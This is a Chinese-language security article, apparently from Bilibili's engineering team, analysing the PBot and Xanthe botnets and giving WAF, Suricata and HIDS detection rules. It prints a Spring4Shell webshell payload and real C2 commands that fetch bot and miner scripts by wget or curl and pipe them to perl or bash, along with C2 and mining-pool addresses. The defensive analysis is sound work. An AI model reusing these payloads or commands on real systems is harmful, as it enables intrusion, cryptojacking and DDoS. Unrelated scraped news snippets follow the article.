专栏电商日志财经减肥爱情
投稿投诉
爱情常识
搭配分娩
减肥两性
孕期塑形
财经教案
论文美文
日志体育
养生学堂
电商科学
头戴业界
专栏星座
用品音乐

B站安全防御系列僵尸网络

  本期作者
  曲妍峰
  资深安全工程师
  01。僵尸网络
  僵尸网络Botnet是指采用一种或多种传播手段,利用bot(僵尸程序)病毒感染和控制数万个主机即黑客常说的傀儡机或肉鸡(肉机),组织成一个个命令与控制(commandandcontrol,CC)节点。控制僵尸网络的攻击机称为僵尸主控机(Botmaster),主控机通过CC服务器向bot发布命令来发送伪造的虚假数据包或是垃圾数据包,达到使攻击目标瘫痪并拒绝服务(DDoS)的目的。据公开报道显示,唐山一骇客曾控制了6万台计算机对某音乐网站进行分布式拒绝服务(DDoS)攻击,造成该网站无法正常提供服务,损失上百万元人民币。
  1。1主要特点
  1。僵尸网络是一个可控制的网络,它具有一定的分布性,随着bot程序的不断传播而不断有新位置的僵尸计算机添加到这个网络中来。
  2。采用了一系列恶意传播手段形成,例如高危漏洞攻击、邮件投送等各种病毒与蠕虫的传播手段,都可以用来进行Botnet的传播,从这个意义上讲,恶意程序bot也是一种病毒或蠕虫。
  3。Botnet最主要的特点是可以一对多地执行相同的恶意行为,比如可以同时对某目标网站进行分布式拒绝服务(DDos)攻击,同时发送大量的垃圾邮件等,而正是这种一对多的控制关系,使得攻击者能够以极低的代价高效地控制大量的资源为其服务。
  1。2活跃度统计
  利用威胁情报收集手段对僵尸网络活跃情况进行统计分析,从安全社区论坛、国内外厂商报告、安全研究机构等多处进行情报数据采集,如各僵尸网络的IOC(IndicatorsofCompromise)情报获取频率、相关报告数量、攻击活动时间等,并结合WAF防护日志研判,分析统计近3个月内活跃情况如下表。安全部门会定期根据活跃僵尸网络排名制定安全防御策略并实施系列防护手段,由于篇幅有限,本文将重点介绍针对近期排名一、二的僵尸网络所采取的防御策略。
  02。PBot僵尸网络
  2。1资料背景
  PBot僵尸网络家族是近年来异常活跃的P2P僵尸网络,善于利用新漏洞发起攻击,如Spring4Shell漏洞(CVE202222965)、GitLabCEEERCE漏洞(CVE202122205)等。因其bot模块为GitHub开源的IRCBot(采用Perl语言编写),且病毒脚本中包含perlbot关键字而得名。据公开资料显示该僵尸网络正通过大量攻击互联网主机植入恶意bot脚本构建僵尸网络来进行挖矿牟利,目前已有上万个受害主机失陷。
  2。2入侵钻石模型
  威胁情报分析领域的入侵钻石模型理论可以用于对僵尸网络组织进行分析,该模型基于集合和图论,分类并创建入侵活动模型,模型的基础是一个原子元素(事件),并由至少四个互连(链接)的特征(节点)组成:技战术手段,基础设施,受害者和影响危害。根据入侵钻石模型理论对PBot僵尸网络家族特征刻画分析及档案建立:攻击技术手段(恶意代码、工具、漏洞):Spring4Shell漏洞(CVE202222965)、GitLabCEEERCE漏洞(CVE202122205)利用的网络基础设施(IP、域名、邮箱、URL):主机IP攻击目标特征(行业、地理):互联网行业攻击影响危害(最终目的):挖矿、DDoS
  2。3技术分析
  执行流程:攻击者首先利用Spring4Shell(CVE202222965)漏洞、GitLabCEEERCE(CVE202122205)漏洞向受影响的脆弱主机植入恶意文件,包含恶意脚本jui。sh、僵尸网络bot模块、lans(下载ssh暴破模块)。恶意脚本jui。sh会下载挖矿shell脚本45。647。txt进行门罗币挖矿并运行僵尸网络bot模块lan构建僵尸网络,恶意脚本lans会从C2(89。44。9。246)下载lan。jpg实现SSH暴破实现横向传播,最终构成挖矿僵尸网络。
  2。3。1Spring4Shell漏洞(CVE202222965)
  攻击者利用Spring4Shell(CVE202222965)漏洞向受影响的脆弱主机植入恶意挖矿脚本及bot模块。Spring4Shell是一个高危远程代码执行(RCE)漏洞,影响JDK9上运行的所有SpringMVC、SpringWebFlux应用程序。分析Spring4Shell漏洞原理,并结合Pbot利用方式总结请求中存在如下特征:
  特殊请求头getheaders{prefix:lt;,suffix:,Thismayseemstrange,butthisseemstobeneededtobypasssomecheckthatlooksforRuntimeinthelogpatternc:Runtime,}
  攻击paylaodclass。module。classLoader。resources。context。parent。pipeline。first。pattern257Bprefix7Di20java。io。InputStream20in203D20257Bc7Di。getRuntime()。exec(request。getParameter(22cmd22))。getInputStream()3B20int20a203D2013B20byte5B5D20b203D20new20byte5B20485D3B20while((a3Din。read(b))!3D1)7B20out。println(new20String(b))3B207D20257Bsuffix7Diclass。module。classLoader。resources。context。parent。pipeline。first。suffix。jspclass。module。classLoader。resources。context。parent。pipeline。first。directorywebappsROOTclass。module。classLoader。resources。context。parent。pipeline。first。prefixshellclass。module。classLoader。resources。context。parent。pipeline。first。fileDateFormat
  下载并执行僵尸网络bot模块GETshell。jsp?pwdk3rwincmdwgetqO89。44。9。246jperlHTTP1。1
  检测思路防护策略lWAF:Web应用防火墙(WebApplicationFirewall),通过执行一系列针对HTTPHTTPS的安全策略来专门为Web应用提供防护的一款安全产品,是B站安全防护体系的第一道防线lNIDS:网络入侵检测系统(NetworkIntrusionDetectionSystem),是安全部门基于suricata自主研发的网络入侵检测系统。通过被动地监测网络上传输的原始流量,对获取的网络数据进行处理,从中提取有用的信息,再通过与已知攻击特征相匹配(策略规则配置)来识别攻击事件lIPS:入侵防御系统(IntrusionPreventionSystem),检测网络或网络设备间非法流量传输行为的安全防护设备lHIDS:主机型入侵检测系统(HostbasedIntrusionDetectionSystem),作为监视器和分析器,监视主机系统动态的行为以及整个计算机系统的状态
  特殊请求头
  a)使用WAF配置安全策略,检测外网存在特殊请求头的request,并实时拦截,策略配置如下:
  a)配置suricata规则,检测产线IDC中存在特殊请求头的request,当发送恶意攻击请求时服务端成功响应后产生告警,对流联动检测规则编写如下:
  alerthttpanyanyanyany(msg:CVE202222965:Spring4Shell远程命令执行漏洞检测Header;flow:toserver,established;content:prefix;httpheader;nocase;content:;httpheader;nocase;content:suffix;httpheader;nocase;content:lt;;httpheader;nocase;flowbit:set,name1;sid:500005;metadata:bycustom;)alerthttpanyanyanyany(msg:CVE202222965:Spring4Shell远程命令执行漏洞检测HeaderResponse;flow:toclient,established;content:200;httpstatcode;content:OK;httpstatmsg;flowbit:isset,name1;sid:500006;metadata:bycustom;)
  攻击payload
  a)使用WAF配置安全策略,检测外网存在特殊body的request,并实时拦截,策略配置如下:
  配置suricata规则,检测产线IDC中存在特殊请求body的request,当发送恶意攻击请求时服务端成功响应后产生告警,对流联动检测规则编写如下:
  alerthttpanyanyanyany(msg:CVE202222965:Spring4Shell远程命令执行漏洞检测Request;flow:toserver,established;content:prefix;httpclientbody;nocase;content:suffix;httpclientbody;nocase;content:getRuntime();httpclientbody;nocase;content:class。module。classLoader。resources。context。parent。pipeline。first。pattern;httpclientbody;nocase;pcre:{prefix}isjava。io。InputStreamsinss{c}i。getRuntime()。exec(request。getParameter(。?))。getInputStream();Ri;flowbit:set,name2;sid:500007;metadata:bycustom;)alerthttpanyanyanyany(msg:CVE202222965:Spring4Shell远程命令执行漏洞检测BodyResponse;flow:toclient,established;content:200;httpstatcode;content:OK;httpstatmsg;flowbit:isset,name2;sid:500008;metadata:bycustom;)
  下载并执行僵尸网络bot模块
  a)使用WAF配置安全策略,检测Pbot下载执行僵尸网络bot模块的GET请求,并实时拦截,策略配置如下:
  a)配置suricata规则,检测产线IDC中Pbot下载执行僵尸网络bot模块的GET请求,当发送恶意攻击请求时服务端成功响应后产生告警,对流联动检测规则编写如下:
  alerthttpanyanyanyany(msg:Pbot僵尸网络恶意下载执行检测;flow:toserver,established;content:shell。jsp;httpuri;nocase;content:cmdwget;httpuri;nocase;content:89。44。9。246;httpheader;flowbit:set,name3;flowbit:noalert;sid:500009;metadata:bycustom;)alerthttpanyanyanyany(msg:Pbot僵尸网络恶意下载执行检测Response;flow:toclient,established;content:200;httpstatcode;content:OK;httpstatmsg;flowbit:isset,name3;sid:500010;metadata:bycustom;)
  2。3。2GitLabCEEERCE(CVE202122205)
  攻击者利用GitLabCEEERCE(CVE202122205)漏洞向受影响的脆弱主机植入恶意挖矿脚本及bot模块。此漏洞由于GitLab没有正确验证传递给文件解析器的图像文件,导致高危远程代码执行(RCE)。分析GitLabCEEERCE利用方式,并结合Pbot利用方式总结请求中存在如下特征:
  获取用户cookie
  RCE
  使用登陆请求返回的Cookie值和csrftoken值,利用漏洞接口uploadsuser上传包含恶意代码的图片文件(如下载僵尸网络的bot模块),实现RCE
  检测思路防护策略
  恶意图片上传
  a)使用WAF配置安全策略,检测外网存在Gitlab的uploadsuser接口上传包含恶意命令的图片文件请求,并实时拦截,策略配置如下:
  a)配置suricata规则,检测产线IDC中对Gitlab的uploadsuser接口上传包含恶意命令的图片文件请求,并与Gitlab登陆态获取请求联动检测:
  alerthttpanyanyanyany(msg:Gitlab登陆请求;flow:toserver,established;content:GET;httpmethod;nocase;content:userssignin;httpuri;nocase;flowbit:set,gitlab;flowbit:noalert;sid:500010;metadata:bycustom;)alerthttpanyanyanyany(msg:CVE202122205:Gitlabexiftool远程命令执行漏洞;flow:toserver,established;content:uploadsuser;nocase;httpuri;fastpattern;content:gitlabsession;nocase;httpcookie;content:Copyright;nocase;httpclientbody;flowbit:isset,gitlab;sid:500011;metadata:bycustom;)
  2。3。3僵尸网络bot模块下载
  利用上述漏洞,可下载并执行以下三种恶意脚本jui。sh、僵尸网络bot模块pp、恶意脚本lans,在流量传输监控中可检测拦截请求中包含的相关下载命令。
  1。恶意脚本jui。sh会下载并运行僵尸网络bot模块lan(使用Perl编写)来构建僵尸网络,并下载挖矿shell脚本45。647。txt进行门罗币挖矿,下载命令如下:wgetqO89。44。9。246lanperlcurls89。44。9。246lanperlwgetqO89。44。9。246all45。647。txtbashcurls89。44。9。246all45。647。txtbash
  2。僵尸网络bot模块pp是使用Perl编写的DDos攻击模块,下载命令如下:wgetqOrun。psybnc。orgppperlcurlsrun。psybnc。orgppperl
  3。恶意脚本lans会从C2(89。44。9。246)下载ssh暴破模块lan。jpg(压缩包文件,包含ssh暴破脚本、暴破字典及生成器)来实现内网横向暴破,lans下载命令如下:wgetqO89。44。9。246lanscurls89。44。9。246lans
  检测思路防护策略
  jui。sh
  使用WAF配置安全策略,检测外网存在lan模块下载请求:
  b)配置suricata规则,检测产线IDC中lan模块下载请求:alerthttpanyanyanyany(msg:Pbot僵尸网络bot模块lan模块下载检测;flow:toclient,established;content:lan;httpheader;nocase;fastpattern;pcre:(wgetcurl)。?(89。44。9。246lanperl)Ri;sid:500020;metadata:bycustom;)alerthttpanyanyanyany(msg:Pbot僵尸网络bot模块lan模块下载检测;flow:toclient,established;content:lan;httpclientbody;nocase;fastpattern;pcre:(wgetcurl)。?(89。44。9。246lanperl)Ri;sid:500021;metadata:bycustom;)
  c)使用WAF配置安全策略,检测外网存在shell脚本45。647。txt下载请求:
  d)配置suricata规则,检测产线IDC中shell脚本45。647。txt下载请求:
  alerthttpanyanyanyany(msg:Pbot僵尸网络bot模块lan模块下载检测;flow:toclient,established;content:。txt;httpheader;nocase;fastpattern;pcre:(wgetcurl)。?(89。44。9。246all。。txtbash)Ri;sid:500022;metadata:bycustom;)alerthttpanyanyanyany(msg:Pbot僵尸网络bot模块lan模块下载检测;flow:toclient,established;content:。txt;httpclientbody;nocase;fastpattern;pcre:(wgetcurl)。?(89。44。9。246all。。txtbash)Ri;sid:500023;metadata:bycustom;)
  pp模块
  a)使用WAF配置安全策略,检测外网存在pp模块下载请求:
  b)配置suricata规则,检测产线IDC中pp模块下载请求
  alerthttpanyanyanyany(msg:Pbot僵尸网络bot模块pp模块下载检测;flow:toclient,established;content:pp;httpheader;nocase;fastpattern;pcre:(wgetcurl)。(run。psybnc。orgppperl)Ri;sid:500024;metadata:bycustom;)alerthttpanyanyanyany(msg:Pbot僵尸网络bot模块pp模块下载检测;flow:toclient,established;content:pp;httpclientbody;nocase;fastpattern;pcre:(wgetcurl)。(run。psybnc。orgppperl)Ri;sid:500025;metadata:bycustom;)
  c)根据pp模块功能特点,检测产线IDC中DDos请求,由于规则数量众多,仅列举部分规则:
  alertudpanyanyany53(msg:DDosDNSBIND9DynamicUpdateDoSattempt;bytetest:1,,40,2;bytetest:1,,0,5;bytetest:1,,0,1;content:000006;offset:8;content:c00c00ff;distance:2;classtype:attempteddos;sid:500026;metadata:bycustom;)alerttcpEXTERNALNETanySMTPSERVERS25(msg:DDosExcessiveSMTPMAILFROMDDoS;flow:toserver,established;content:MAILFROM3a;nocase;window:0;id:0;threshold:typelimit,trackbysrc,count30,seconds60;classtype:denialofservice;sid:500027;rev:2;metadata:bycustom;)alertudpEXTERNALNET123HOMENET123(msg:DDosPotentialInboundNTPdenialofserviceattempt(repeatedmode7request);dsize:1;content:17;threshold:typelimit,count1,seconds60,trackbysrc;classtype:attempteddos;sid:500028;rev:2;metadata:bycustom;)
  lans模块
  a)使用WAF配置安全策略,检测外网从C2(89。44。9。246)下载ssh暴破模块lans请求:
  b)配置suricata规则,检测产线IDC中从C2(89。44。9。246)下载ssh暴破模块lans请求:
  alerthttpanyanyanyany(msg:Pbot僵尸网络bot模块pp模块下载检测;flow:toclient,established;content:lans;httpheader;nocase;fastpattern;pcre:(wgetcurl)。(89。44。9。246lans)Ri;sid:500029;metadata:bycustom;)alerthttpanyanyanyany(msg:Pbot僵尸网络bot模块pp模块下载检测;flow:toclient,established;content:lans;httpclientbody;nocase;fastpattern;pcre:(wgetcurl)。(89。44。9。246lans)Ri;sid:500030;metadata:bycustom;)
  c)根据pp模块功能特点,使用IPS检测ssh横向暴破行为:
  03Xanthe挖矿僵尸网络
  3。1资料背景
  多家安全厂商报告显示,一款名为Xanthe的僵尸网络近两年正活跃进行挖矿活动,Xanthe是一个加密劫持恶意软件家族,其主要目标是劫持系统资源以挖掘Monero加密货币。Xanthe采用各种方法在网络中传播,例如收集客户端证书以使用ssh传播到已知主机,或传播到配置错误的DockerAPI的系统。最新报告显示,Xanthe木马除了继续从事挖矿的老本行外,新版本中还添加了投递名为brickerbotv2的Mirai僵尸网络bot程序的功能,攻击者可以借此实现对外发起DDoS攻击的目的。
  3。2入侵钻石模型
  根据威胁情报分析领域的入侵钻石模型理论,可以从以下角度对PBot僵尸网络家族特征刻画分析及档案建立:攻击技术手段(恶意代码、工具、漏洞):fczyo、alduro、sesa。txt利用的网络基础设施(IP、域名、邮箱、URL):主机IP攻击目标特征(行业、地理):互联网行业攻击影响危害(最终目的):挖矿
  3。3技术分析
  Xanthe挖矿僵尸网络的恶意功能分别集成在各个恶意脚本中,主要分为以下3个模块:
  http:209。141。34。37fczyo
  http:209。141。34。37alduro
  http:209。141。34。37sesa。txt
  3。3。1fczyo模块
  lqbot()函数:将http:45。61。184。81x86文件下载到本地并执行,分析代码内容发现,x86文件是基于开源Mirai代码改编的ELF可执行程序,类似网上流行的Mirai僵尸网络样本,具有反调试、单例运行、阻止重启设备等功能,且在运行后会自删除,并通过连接45。61。184。81:81地址来接收主控机下发的DDoS攻击指令,并支持多种DDos攻击类型,包括tcpsyn、tcpack、tcpstomp、udpdns、udpplain等
  检测思路防御策略
  a)使用NIDS检测产线流量中的恶意x86文件传输,文件以md5值唯一识别,若发现恶意文件告警则立即上机清理,规则配置如下:
  b)防火墙封禁可以连接DDoS指令的恶意地址45。61。184。81
  host函数:分析host函数源码,发现此函数主要目的是将131。153。142。106pool。hashvault。pro矿池地址写入本地的etchost文件
  检测思路防御策略
  a)HIDS检测etchost文件是否被修改,若修改则产生告警并介入处理,策略配置如下:
  b)防火墙直接封禁矿池地址
  3。3。3。alduro模块
  filegetgo函数:会执行下载http:209。141。34。37adnckil挖矿程序请求,分析恶意程序发现采用了UPX加壳,脱壳处理后可以看到它是编译于2022。7。13日的开源XMRig矿机6。18。0版本
  检测思路防御策略
  a)IPS文件检测adnckil挖矿木马下载,md5值为3932979ca166dc69cca192490318f700,规则配置如下:
  b)使用NIDS监测产线流量中可执行文件下载,规则如下:alerthttpEXTERNALNETanyHOMENETany(msg:Executableandlinkingformat(ELF)filedownloadOverHTTP;flow:established;flowbits:isnotset,ET。ELFDownload;filedata;content:7FELF;within:4;flowbits:set,ET。ELFDownload;reference:url,www。itee。uq。edu。aucristinastudentsdavidhonoursThesis96bff。htm;reference:url,doc。emergingthreats。netbinviewMain2000418;classtype:policyviolation;sid:2019240;rev:1;metadata:createdat20220925,updatedat20221013;)
  lsshkeysgo函数:往authorizedkeys文件内写入攻击者的SSH公钥,实现免密登录
  检测思路防御策略
  a)HIDS定时监控authorizedkeys文件文件是否被写入特殊SSH公钥
  3。3。3。sesa。txt模块
  lsesa。txt模块与fczyo模块存在相同指令,即修改etchosts文件,阻断受害主机上原本存在的安全软件以及竞争对手的网络连接,达到独占网络带宽的目的l禁用AppArmor,AppArmor是Linux内核的一个安全模块,其允许系统管理员将每个程序与一个安全配置文件关联,可以指定程序可以读、写或运行哪些文件,是否可以打开网络端口等,从而限制程序的功能,达到访问控制的目的。
  检测思路防御策略
  a)同fczyo模块中host函数检测思路相同,使用HIDS监控etchosts文件改动
  b)HIDS监测主机是否执行systemctlstopapparmor命令
  作者:曲妍峰
  来源:微信公众号:哔哩哔哩技术
  出处:https:mp。weixin。qq。comsX9l4M0RzVJJeNGXmx5TrBw

七彩虹将星X16Pro游戏本升级VC均热板,性能释放突破200W不知不觉,七彩虹已经杀进笔记本市场好几年了。在这几年里,七彩虹的将星系列凭借出色的性价比和越级的售后慢慢坐稳了入门级游戏本的市场。而在笔记本大规模换代的这个2023年,七彩虹推出了亮机卡也有春天锐龙7000核显超频到3。1GHz游戏性能猛增40AMD前面几代的锐龙桌面处理器(非APU系列)是纯CPU,没有整合核显GPU的,大概是觉得用户都会配独显,上核显是浪费,直到锐龙7000上才全系标配核显。当然,AMD也给的不多,RNUC13Extreme猛禽峡谷体验13代酷睿让每公升性能更涌动Intel的NUC系列产品自首次发布到今年已经是10周年了,年初推出的第12代NUCExtreme,代号DragonCanyon,算是对过去这十年做了个完满总结,但没想到,今年In魏晋时期,居然会保留俘虏3大基本人身权利,开发利用俘虏资源魏晋时期诸雄逐鹿,争霸和兼并战争频仍,尤以三国时期为最。争霸双方多方交战是为了争取更大的利益,而非视对方为仇雠。在这种情况下俘获俘虏,通常会选择实际上对己方最有利的处置方式。将俘虏WiFi如何防止别人蹭网的方法wifi怎么防止别人蹭网?wifi怎么防止万能钥匙?这是很多用户关心的一个问题。下面本文会详细介绍,在使用无线wifi的过程中,如何来避免wifi网络被别人蹭网。一设置安全的无线w定了!王楚钦孙颖莎成夺冠热门,将以头号种子身份参加大满贯赛头条创作挑战赛乒乓球友您好,我是乒谈。WTT新加坡大满贯赛,是德班世乒赛开幕前最为重要的一站商业赛事,将于3月7日在新加坡体育中心开打。目前距离赛事开打还有半个月左右的时间,WTT颜值打分更像是一种娱乐消遣弓长据近日央视网北京青年报等媒体报道,长相评价颜值打分近来开始在各大社交平台流行。不少网友毫无保留地将纯素颜自拍照晒出,并附上求大家说说第一印象评分等文案,期待陌生网友在评论区为其四川规模经营提升种粮收益来源经济日报四川是全国13个粮食主产省之一,也是西部唯一的粮食主产省。今年1月份,四川印发了建设新时代更高水平天府粮仓行动方案,将实施一系列政策措施,实现农业现代化强省目标。202跨国消费巨头谈中国市场前景向好充满信心来源中国经济网中国经济网上海2月22日讯(记者何欣)岁末年初,消费品领域的外资企业寻求在中国抢占更多的市场份额。外资企业持续增资的背后,体现了对中国经济发展前景的信心。活跃的市场,十一届省委第三轮巡视完成进驻河南日报客户端记者刘勰河南日报社全媒体记者崔文2月22日,记者从省委巡视办了解到,十一届省委第三轮巡视15个巡视组完成对4个省辖市及所辖34个县(市区)的巡视进驻。被巡视单位分别召84岁李双江夫妇高调设宴!疑似李天一出狱,现场欢声笑语一片文龙跃谭编辑龙跃谭前言2月20日晚间,低调多年的李双江夫妇出现在朋友的聚会中。因为多年前的李天一事件,李双江大受打击,但这次聚会却一改往日的颓势,看起来心情大好。难道真如网友所说是
24h情趣用品无人售货店,究竟有哪些优势?无人售货,一个看似现代化的概念,起源于20世纪中期的西欧,上世纪70年代开始在日本欧美等国家兴起。近年来,在互联网人工智能等技术的快速发展推动下,我国无人零售市场快速发展,无人零售什么是真正的孝顺(原创)带有荒诞的孝顺,是以表象掩盖索取,既然是孝顺,为啥要私加索取?凡是以对父母的孝顺和付出,而需要索取利益而诋毁真正从一而终,无条件孝顺父母的,都是大逆不道的不孝,因为它破坏了父母希望中秋佳节,别管多忙,记得吃3样,忌3样,喜迎中秋,阖家团圆农历八月十五中秋节,是我国传统的拜月赏月团圆节日,在民间的重要性仅次于春节。中秋节也被叫作团圆节,所以中秋佳节,别管有多忙,记得吃3样,忌3样,喜迎中秋,阖家团圆。鸡大吉大利所谓无外媒法零售商呼吁政府设置能源价格上限法新社巴黎消息,在欧盟国家相关部长召开紧急会议之际,法国大型零售商9日通过行业联合会Perifem表示,欧盟委员会关于遏制天然气价格飙升的提议是不足的,并要求政府设置能源价格上限。美国移民喜讯!领取部分公共福利不影响拿绿卡9月8日美国国土安全部(DHS)宣布一项新的公共负担(publiccharge)规定,其中明确表明DHS在做出移民身分决定时,不会将申请者使用医疗保险营养补助或住房津贴列入考虑范围伊巴涅斯首次入选巴西大名单,罗马官方祝贺恭喜直播吧9月10日讯9月下旬,巴西国家队将进行两场热身赛,对手分别是加纳和突尼斯。巴西国家队昨日公布了最新一期的球队大名单,其中,罗马后卫伊巴涅斯首次入选。罗马俱乐部也在俱乐部官方网恭喜!香港知名女星怀孕十个月临盆在即,晒妊娠纹吓坏网友本文编辑剧透社issac未经授权严禁转载,发现抄袭者将进行全网投诉香港知名女星靓模郭思琳临盆在即!她如今已经怀孕十个月的时间,预产期就在下周。即将升级做妈妈的她,此时此刻的心情既紧英国女王的假面,终于可以摘下了作者小伍工闫如意编辑米利暗传奇落幕了。当地时间9月8日,伊丽莎白女王逝世,享年96岁。她在位70年,是英国历史上在位时间最久年纪最长的君主。头戴王冠的这70年里,她经历过战火纷飞也中央决定,李金发履新据中国地质调查局官网消息,9月9日下午,中央组织部有关负责同志出席中国地质调查局领导干部会议,宣布中央决定李金发同志任中国地质调查局党组书记,免去钟自然同志的中国地质调查局党组书记数读8月已达47。8文懂车帝原创常思玥懂车帝原创行业日前,中国汽车工业协会发布8月份市场信息,其中中国品牌乘用车的市场表现节节攀升。8月中国品牌乘用车市场份额保持增长,图片来源中汽协数据显示,今年8月网友选出几款最丑车型,对不起我真的笑了,你的车中招了吗?2002款菲亚特Multipla菲亚特multipla是菲亚特在2002年推出的一款MPV车型,这款车型的外观确实一言难尽,实在看不懂设计师的思维,许多网友表示开上它简直不敢见朋友
友情链接:快好找快生活快百科快传网中准网文好找聚热点快软网